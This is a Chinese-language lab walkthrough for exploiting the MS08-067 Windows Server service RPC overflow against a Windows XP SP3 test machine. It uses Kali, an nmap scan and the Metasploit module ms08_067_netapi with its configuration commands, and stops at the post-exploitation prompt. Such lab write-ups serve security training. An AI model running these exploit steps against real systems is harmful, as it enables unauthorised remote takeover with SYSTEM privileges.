前言
漏洞描述:
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。
kali下载:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Windows xp下载:https://pan.baidu.com/s/13wyedDfuZdgkjgYgVCnYTA?pwd=csb6
提取码:csb6
备用windows xp下载:MSDN, 我告诉你 - 做一个安静的工具站(此站系统可能已修复此漏洞)
1、环境搭建
kali进入管理员用户:sudo su默认密码为:kali(密码不可见)
攻击机kali IP:192.168.13.128
查询方法:终端输入指令ifconfig
靶机Windows xp SP3 IP:192.168.13.132
查询方法:win+r输入cmd打开命令窗口输入ipconfig
查询两台主机是否互通:用kali 输入 ping 192.168.13.132 -c 4
-c 4:4次测试后停止
2、信息收集
使用nmap工具扫描目标机端口
代码:nmap -A -T4 -sV 192.168.13.132
-A 选项用于使用进攻性(Aggressive)方式扫描;
-T4 指定扫描过程使用的时序(Timing),T4表示快速扫描。
总共有6个级别(0-5),级别越高,速度越快,但也容易被防火墙发现;
-sV:获取对应端口上更为详细的服务版本信息
可以看到开放的端口有445、139、443等等,操作系统为Windows xp等信息。
3、漏洞利用
尝试利用ms08-067漏洞使用软件Metasploit
打开msf软件命令:msfconsole
查找ms08-067攻击载荷
使用攻击载荷:use 0 或use exploit/windows/smb/ms08_067_netapi
查看必选配置项(Required为yes为必选配置)
配置目标IP:set rhosts 192.168.13.132
查询系统版本对应编号:show targets
我们的靶机系统是Windows xp sp3所以选择7
配置目标系统版本:set target 7
配置攻击载荷
启动程序:run或exploit
4、后渗透攻击
输入?查看我们能干什么